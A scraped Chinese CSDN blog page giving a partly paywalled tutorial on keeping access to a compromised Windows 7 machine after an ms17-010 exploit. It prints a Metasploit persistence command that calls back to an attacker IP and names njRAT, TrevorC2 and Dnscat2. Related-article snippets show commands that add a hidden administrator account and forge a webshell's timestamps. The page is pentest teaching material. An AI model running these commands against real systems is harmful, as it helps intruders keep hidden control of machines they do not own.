010109权限维持

最新推荐文章于 2024-06-27 08:00:00 发布

菜多练

最新推荐文章于 2024-06-27 08:00:00 发布

阅读量398

点赞数

分类专栏：网络安全文章标签：经验分享

本文链接：https://blog.csdn.net/TangTang_AM/article/details/123936423

版权

网络安全专栏收录该内容

13 篇文章 0 订阅

订阅专栏

9-1权限维持

1. 权限维持的原因

前提：某目标服务器初始化现阶段存在安全漏洞，可以被利用拿到服务器权限。

一段时间后，系统管理员对系统进行升级，打补丁（patch），系统不存在安全漏洞，导致无法利用漏洞获得服务器权限。

2. 权限维持的使用

技术本身不具备好与坏，只是因为使用者的目的不同，导致结果的好与坏。

恶意人员利用权限维持技术，一直获得服务器的权限。

合法且被授权的渗透测试人员，利用权限维持为了证明服务器存在对应的安全漏洞。

3. 权限维持案例环境介绍

目标机器：win7 没有ms17-010补丁。

利用Metasploit中 ms17-010对应的Exploit可以进行渗透测试，获取”临时”的System权限。（当补丁打上就不同利用ms17-010获取System权限）。

4. 权限维持案例

使用Metasploit run persistence 模块

run persistence -U -i 10 -p 4444 -r 192.168.34.132

9-2权限维持 - 远程控制

1. 远程控制生成与上传

使用njRAT进行演示

2. 重启系统测试

重启机器进行上线测试，以及对对应功能介绍。

9-3权限维持 - TrevorC2工具

9-4权限维持 - Dnscat2工具

9-5权限维持 - JsRAT工具

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

菜多练

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Windows权限维持

谢公子的博客

05-28

2287

目录创建隐蔽账号进程迁移启动目录横向渗透在红蓝对抗实战中，当我们获取到一台Windows主机的权限后，首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强，并且他们的流量监测设备也在不断监控，如果发现机器被植入木马，他们肯定会采取措施。比如采取以下几点措施：查杀木马进程重启主机断网关闭主机而对于我们维持权限，可以有以下几点：创建隐蔽账号如果目标主机的3389端口开放着，则我们可以创建隐蔽账号。或者读取该主机administrator账号密码，使用

十三、权限维持

谢小二的博客

06-12

1317

权限维持

参与评论您还未登录，请先登录后发表或查看评论

.NET 一款支持8种方式维持权限的工具

最新发布

ahhacker86的专栏

06-27

345

Sharp4RedPersist是一款功能强大的持久化工具，专为在Windows环境中操作的红队设计。通过利用各种持久化机制，这款工具能够在被攻陷的系统上维持访问权限。Sharp4RedPersist支持八种或更多不同的方法，确保通过多个向量保持持久访问。

windows 权限维持

weixin_52263461的博客

01-20

273

添加影子用户影子用户顾名思义就是一个隐藏用户，只能通过注册表查看这个用户，其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户，但是在计算机管理里面还是可以看的到。创建普通账号 net user huahua 123456 /add net localgroup administrators huahua /add (将用户加入组) 创建隐藏账户 net user huahua$ 123456 /add net user 查看

权限维持：DSRM 域控权限维持

f_carey的博客

12-18

3858

域控权限维持1 修改 DSRM 密码2 DSRM 域后门操作过程3 DSRM 域后门防御目录服务恢复模式（DSRM，Directory Services Restore Mode），是Windows服务器域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账户 (也就是DSRM账户)。 DSRM用途：允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库，使域环境的运行恢复正常。在域环境创建初期，DSRM 的密码需要在安装 DC 时设置，且很少会被重置。修改 DSRM 密码最基本的方法

Windows常见的几种权限维持

hackzkaq的博客

05-24

1691

零基础学黑客，搜索公众号：白帽子左一 1.映像劫持技术简介 “映像劫持”，也被称为“IFEO”（Image File Execution Options），在WindowsNT架构的系统里，IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时，它的内存分配则根据该程序的参数来设定，而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据，最终得以设定一个程序的堆管理机制和一些辅助

CIS2019-域权限维持方法浅析-终稿-20191125终.pdf

09-17

CIS2019-域权限维持方法浅析-终稿-20191125终.pdf

web层的权限维持

Nginxx的博客

11-17

2485

前言在实战渗透中，经常需要上传webshell来完成对目标的权限维持。通过各种方法来构造一个免杀的webshell后门来实现webshell层面的权限维持是大家比较通用的方法，但是除了简单粗暴的写php免杀马，实战中还有一些小技巧值得去学习，毕竟除了要绕过各种waf的防护，还需要绕过“人肉waf“ 管理员的火眼金睛，因此本文将分享一些在web层权限维持常用的方法和技巧。隐藏webshell 隐藏webshell是web层维持权限的基本方法，但是如果直接写php文件，哪怕是源码免杀，也很容易被管理员发现，

内网渗透-window权限维持

lza20001103的博客

09-26

2220

window权限维持文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记前言上期讲完了横向移动后，我们拿到了管理员的权限，当我们离开时，下一次要是还想拿到的是管理员的权限呢，难道我们还要继续一波操作提取啥的吗，其实不然，接下来将是最重要的内容，就是我们的权限维持的操作了，对于后渗透有着至关重要的

权限维持篇

WX公众号-小白学安全

04-15

938

攻击者在获取服务器权限后，会通过一些技巧来隐藏自己的踪迹和后门文件，本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术，包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用，欢迎留言分享。在渗透测试中，有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么，通过漏洞获取到目标主机权限后，如何利用框架获得持久性权限呢？

Linux权限维持

2403_82795493的博客

02-26

691

在攻击者利用漏洞获取到某台机器的控制权限之后，会考虑将该机器作为一个持久化的据点，种植一个具备持久化的后门，从而随时可以连接该被控机器进行深入渗透。

linux权限维持

E1even的博客

11-04

975

接下来将开启linux权限维持的学习：放一张Llinux权限维持镇楼图(图源ShAun’s Blog) 修改文件创建时间如果蓝队根据文件修改时间来判断文件是否为后门，如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题。使用touch命令修改时间和属性 touch -r index.php shell.php 这里就复刻了index.php的属性，创建了一个同属性的shell.php ...

Linux系统权限维持

m0_56109788的博客

11-08

如果蓝队根据文件修改时间来判断文件是否为后门，如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题解决方法：touch -r index.php shell.php#将文件shell.php的时间修改为和index.php相同，如果shell.php文件不存在，就创建shell.php文件touch命令用于修改文件或目录的时间属性，包括存取时间和更改时间。若文件不存在，系统会建立一个新的文件。

web端权限维持

wodafa的博客

02-27

1301

前言关于权限维持，我之前写过一篇基于系统端的后门技术文章，如映像劫持啊，lpk之类。当然啦，在拿到权限后，在web端做手脚也是个好办法。 PS：还是希望论坛早点支持markdown哦，不然排版很是费劲。内容目录： - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点正文 0x01 构造文件包含漏洞 >**本部分概览：** > * 基本的文

渗透测试中的权限维持技术

网络安全-渗透中的权限维持-杨晓成-360 权限维持是渗透测试中的一个重要步骤，它指的是攻击者在攻破目标系统后，如何维持对系统的控制权，以便长期获取目标系统的敏感信息或进行进一步的攻击。权限维持的重要性在于...